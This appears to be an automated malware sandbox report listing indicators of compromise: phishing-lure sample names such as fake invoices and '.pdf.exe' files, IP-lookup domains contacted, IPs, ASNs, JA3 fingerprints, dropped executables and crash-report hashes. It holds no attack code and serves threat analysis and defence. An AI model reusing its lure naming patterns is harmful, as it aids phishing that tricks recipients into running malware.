                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          131.186.113.70SALES.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Statement.pdf.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          orden010221.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG_1660392.docGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          my new file ify (1).exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG_166390pdf.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG-6661.docGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG_761213.docGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Sale_Contract.com.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG_04017.pdf.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          INV_098789.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          2021 NEW LIST.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          CHIKWA.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          weg6tX6TTk78XZ5.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG_0661.docGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          INV0009876.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          000000000009000000.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          IMG_53091.pdf.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Copy_Payment.exeGet hashmaliciousBrowse
                                                                                          • checkip.dyndns.org/

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          freegeoip.appSALES.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Revised Invoice.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          RFQ - 0201201.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Statement.pdf.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          CMR2OEYL.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          NEW ORDER.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          ProcessingIConnect.Common..TermsConditions.z.pdf.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          PO 642021.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          00000000000000000090.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          IMG_1660392.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          IMG_1660392.docGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          NS_PO_86655443.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          INV#1191189.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          NEW PURCHASE#U00c3#U00bf #U00c3#U00bfORDER.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          0009752202_OUTSTANDING_20210129,PDF.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          CITI SOLUTION COMPANY PROFILE.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          whatismyipaddress.comOrders.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          nzGUqSK11D.exeGet hashmaliciousBrowse
                                                                                          • 104.16.154.36
                                                                                          PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          hkaP5RPCGNDVq3Z.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          B6LNCKjOGt5EmFQ.exeGet hashmaliciousBrowse
                                                                                          • 104.16.154.36
                                                                                          NDt93WWQwd089H7.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          JkhR5oeRHA.exeGet hashmaliciousBrowse
                                                                                          • 66.171.248.178
                                                                                          PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                                                          • 104.16.154.36
                                                                                          INQUIRY.exeGet hashmaliciousBrowse
                                                                                          • 104.16.154.36
                                                                                          Prueba de pago.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          879mgDuqEE.jarGet hashmaliciousBrowse
                                                                                          • 66.171.248.178
                                                                                          remittance1111.jarGet hashmaliciousBrowse
                                                                                          • 66.171.248.178
                                                                                          879mgDuqEE.jarGet hashmaliciousBrowse
                                                                                          • 66.171.248.178
                                                                                          remittance1111.jarGet hashmaliciousBrowse
                                                                                          • 66.171.248.178
                                                                                          https://my-alliances.co.uk/Get hashmaliciousBrowse
                                                                                          • 66.171.248.178
                                                                                          c9o0CtTIYT.exeGet hashmaliciousBrowse
                                                                                          • 104.16.154.36
                                                                                          mR3CdUkyLL.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36
                                                                                          6JLHKYvboo.exeGet hashmaliciousBrowse
                                                                                          • 104.16.155.36

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          DYNDNSUSPayment Advice.exeGet hashmaliciousBrowse
                                                                                          • 131.186.113.70
                                                                                          SALES.exeGet hashmaliciousBrowse
                                                                                          • 131.186.113.70
                                                                                          Revised Invoice.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.70
                                                                                          RFQ - 0201201.exeGet hashmaliciousBrowse
                                                                                          • 162.88.193.70
                                                                                          Statement.pdf.exeGet hashmaliciousBrowse
                                                                                          • 131.186.113.70
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 131.186.113.70
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 162.88.193.70
                                                                                          orden010221.exeGet hashmaliciousBrowse
                                                                                          • 131.186.113.70
                                                                                          CMR2OEYL.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.71
                                                                                          full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exeGet hashmaliciousBrowse
                                                                                          • 131.186.161.70
                                                                                          NEW ORDER.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.70
                                                                                          ProcessingIConnect.Common..TermsConditions.z.pdf.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.71
                                                                                          PO 642021.exeGet hashmaliciousBrowse
                                                                                          • 162.88.193.70
                                                                                          00000000000000000090.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.71
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.71
                                                                                          IMG_1660392.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.70
                                                                                          IMG_1660392.docGet hashmaliciousBrowse
                                                                                          • 216.146.43.70
                                                                                          NS_PO_86655443.exeGet hashmaliciousBrowse
                                                                                          • 131.186.161.70
                                                                                          INV#1191189.exeGet hashmaliciousBrowse
                                                                                          • 216.146.43.71
                                                                                          NEW PURCHASE#U00c3#U00bf #U00c3#U00bfORDER.exeGet hashmaliciousBrowse
                                                                                          • 162.88.193.70
                                                                                          CLOUDFLARENETUSPayment Advice.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          SALES.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Revised Invoice.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          RFQ - 0201201.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Statement.pdf.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154
                                                                                          NEW ENQUIRY.xlsxGet hashmaliciousBrowse
                                                                                          • 104.22.0.232
                                                                                          SOA - NCL INTER LOGISTICS.xlsxGet hashmaliciousBrowse
                                                                                          • 104.22.1.232
                                                                                          CSWWOe1Gnx.htmlGet hashmaliciousBrowse
                                                                                          • 104.16.19.94
                                                                                          PO_210202.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.32
                                                                                          Invoice764895.xlsGet hashmaliciousBrowse
                                                                                          • 172.67.193.211
                                                                                          Invoice764895.xlsGet hashmaliciousBrowse
                                                                                          • 104.21.76.113
                                                                                          po.exe.exeGet hashmaliciousBrowse
                                                                                          • 23.227.38.74
                                                                                          CMR2OEYL.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          129ZD381.xlsGet hashmaliciousBrowse
                                                                                          • 172.67.204.162
                                                                                          129ZD381.xlsGet hashmaliciousBrowse
                                                                                          • 172.67.204.162
                                                                                          q2EKWldniJ.exeGet hashmaliciousBrowse
                                                                                          • 104.16.16.194
                                                                                          evil.docGet hashmaliciousBrowse
                                                                                          • 104.16.126.175
                                                                                          full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exeGet hashmaliciousBrowse
                                                                                          • 172.67.188.154

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adPayment Advice.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          SALES.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Revised Invoice.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          RFQ - 0201201.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Statement.pdf.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          CMR2OEYL.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          NEW ORDER.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          OOLU2115327710.xls.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          ProcessingIConnect.Common..TermsConditions.z.pdf.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          SOPORTEDE.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          POinv00393.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          PO 642021.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          00000000000000000090.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          IMG_1660392.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          mEPx5H8svq.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200
                                                                                          NS_PO_86655443.exeGet hashmaliciousBrowse
                                                                                          • 104.21.19.200

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          C:\Users\user\AppData\Local\Temp\hawkgoods.exeOrders.exeGet hashmaliciousBrowse
                                                                                            C:\Users\user\AppData\Local\Temp\origigoods20.exeOrders.exeGet hashmaliciousBrowse
                                                                                              C:\Users\user\AppData\Local\Temp\Matiexgoods.exeOrders.exeGet hashmaliciousBrowse
                                                                                                C:\Users\user\AppData\Local\Temp\origigoods40.exeOrders.exeGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_697020edb13ed8bc761f5d6b0de413dddfcbfb_b4666e22_12f099c3\Report.wer
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17818
                                                                                                  Entropy (8bit):3.766553825659537
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:UwHLs3pHBUZMXJyBaPLk9Mg5N3gFm1pzvnuk1+K1QtKVzss/u7sVS274Itmxeon:rLs3ZBUZMXiayRv1jz3/u7sVX4ItOd
                                                                                                  MD5:1B14E26F15C08169BD1E448474C1F7AB
                                                                                                  SHA1:3FF1E3F413BDD11D5784E94EFCDFE0609CD50B1A
                                                                                                  SHA-256:B680E94518074E808301D5E76EA73ACACCFF2FEC67401CCD13B2C039780F6F65
                                                                                                  SHA-512:682801D9682FDF42DBB98535EAA07596432BCDA55855477CFD0D2FA04C0FAB2A1F4B5E4E208CB87EB417772EF0848BDEE0ECEC71FA1281CE3737419AFB9A4C23
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.4.0.9.0.7.4.3.2.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.4.5.3.1.2.9.5.8.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.5.b.c.c.8.c.-.2.5.b.4.-.4.a.6.4.-.9.5.6.8.-.8.c.8.e.1.2.a.2.0.a.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.e.5.f.a.8.c.-.a.a.3.8.-.4.7.5.6.-.9.b.3.b.-.5.d.5.d.6.a.8.3.8.0.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.a.w.k.g.o.o.d.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.7.-.3.7.9.8.-.7.7.d.a.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_697020edb13ed8bc761f5d6b0de413dddfcbfb_b4666e22_1b230661\Report.wer
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17916
                                                                                                  Entropy (8bit):3.7657882578191666
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:xt91Q3pHBUZMXJyBaKsn9fbeN9M2v1zzvSXk0ZKjBIcQr+s/u7s4S274ItmxeY:h1Q3ZBUZMXiaEdvh/sl/u7s4X4ItOF
                                                                                                  MD5:6FE02F566E5BC86C856A4746E5B1B37E
                                                                                                  SHA1:45764D32FED814C6E0E4D3D7A498DC74ECCD2EE3
                                                                                                  SHA-256:3317003BFF2506D41F1DCCB35B30D0C8D94F389E40D7A77242DA1C7456C05268
                                                                                                  SHA-512:DF8BC7E1E759B493C00C697ACBBDA26C88B7FEC6152F627311697B17E65500C25B245907989AC275985296CFCF11EBDD13760D724AC527A4A24915C314CFF029
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.3.3.1.6.5.2.6.3.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.3.5.2.1.5.2.5.9.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.1.e.4.f.3.3.-.4.c.0.f.-.4.f.1.b.-.9.c.3.2.-.5.c.3.e.a.3.d.7.e.8.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.f.9.2.a.c.e.-.4.5.3.0.-.4.8.4.d.-.8.2.8.a.-.f.2.5.7.1.3.c.5.6.8.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.a.w.k.g.o.o.d.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.c.-.0.0.0.1.-.0.0.1.7.-.6.9.7.2.-.c.b.b.1.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_93f07d9c4f92cda17563b29cabdf995c588ef9_00000000_14dc0d13\Report.wer
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16862
                                                                                                  Entropy (8bit):3.758463269003457
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:PmLhQmV4yBaPLk9Mg5N3gFm1pzvnuk1+K1QtKVzz/u7sVS274ItiLn:eLhQSayRv1jzz/u7sVX4Iten
                                                                                                  MD5:5B656D3CB77E098CA4DF1D1C0CE0E328
                                                                                                  SHA1:ABA48932FBF3EC81ADA9341DE6B97AC4668AD94C
                                                                                                  SHA-256:85D229EC5FFF7DBF8DDC2CEFA7281BD453B84E1D3F70204FE83A582F0246D164
                                                                                                  SHA-512:928397B3DD92C244E5916D7FD3B61EB2B9E0B3794D6CB477BDADB6CBD75090FCA850DDC950DA714E89484EFF60684E6AE742C73930D6F83BAE3AE2FA665B9962
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.3.8.5.1.0.5.6.3.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.3.8.9.5.1.1.8.4.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.6.f.6.c.2.-.1.4.1.c.-.4.8.8.c.-.9.4.4.0.-.e.a.0.f.5.9.8.2.7.2.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.7.-.3.7.9.8.-.7.7.d.a.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.2.8.5.c.6.!.h.a.w.k.g.o.o.d.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.1././.1.9.:.1.0.:.0.8.:.3.8.!.0.!.h.a.w.k.g.o.o.d.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5...
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_93f07d9c4f92cda17563b29cabdf995c588ef9_00000000_1a4a83a4\Report.wer
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16958
                                                                                                  Entropy (8bit):3.758176808526625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sK11QmV4yBaKsn9fbeN9M2v1zzvSXk0ZKjBIcQry/u7sTS274Itip:111QSaEdvh/sy/u7sTX4Itg
                                                                                                  MD5:E69F7F2D40A3282E3A5C4D25F316EEFD
                                                                                                  SHA1:FF12BFC6A914E52FD5A233C18C99BF7E128DFC10
                                                                                                  SHA-256:2D0F631D768C4D0B5FA1211D11CAE7F657DB56553606E18FCF4E5CE04878607A
                                                                                                  SHA-512:1C0F891A498A9D74A59A09285423C3173248E2A715F6C43D8499EA9EEA1556CB536A9D8118E81AEECA94936C0AC78F29B6422ADF28D008C80085299D299EFBA0
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.3.1.6.0.9.0.1.7.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.3.1.8.7.3.0.7.9.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.9.1.a.8.b.5.-.7.b.7.d.-.4.6.4.e.-.8.7.5.0.-.7.c.9.c.1.4.1.a.8.6.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.c.-.0.0.0.1.-.0.0.1.7.-.6.9.7.2.-.c.b.b.1.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.2.8.5.c.6.!.h.a.w.k.g.o.o.d.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.1././.1.9.:.1.0.:.0.8.:.3.8.!.0.!.h.a.w.k.g.o.o.d.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5...
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F33.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6346
                                                                                                  Entropy (8bit):3.727723917153232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNiJn66RY0SwZCpra89bvcsfRlm:RrlsNiJ6EY0SwCvvfK
                                                                                                  MD5:D9A75C2F37E77481D156E098A916F868
                                                                                                  SHA1:586C14F42B7EFA8A883FAA53B416F0C491B218B7
                                                                                                  SHA-256:AAA58719C37F44B8FD215C19F46455439079D3B8AFB77BCD1212947B45474CC6
                                                                                                  SHA-512:F4E44BB08682D51682622FD695C6F2DBBA11DFCE95702B5857F46BDE655B9F5C5FBD88148602A7167B334CA8E10917671F530FF9BC6123EEB3EBBC40E6BB0414
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB7.tmp.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4658
                                                                                                  Entropy (8bit):4.484087176387836
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zscJgtWI9HnWSC8BAb8fm8M4JUkZFI+q84UZ/URyHwd:uITfaoWSNBJJUoZcRyHwd
                                                                                                  MD5:745EBD9EB867F5C20629FE5A76B20E2E
                                                                                                  SHA1:01E88CAA25F3BBF0E69ECBE25A51CC8ED1975EA3
                                                                                                  SHA-256:8983A0C40000ABE4FB9D2FAD11770B2177CF7960842134582B219551BF357DC6
                                                                                                  SHA-512:D65656378EB01D6F1F094C27EB95DE2F10774F68BC4AE266C40EA16975DF60212515A5CC7FE23039FEE53B1871338F4DBD78C24D70AE3F5F9CF1054D12924FCF
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843964" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER72DC.tmp.WERInternalMetadata.xml
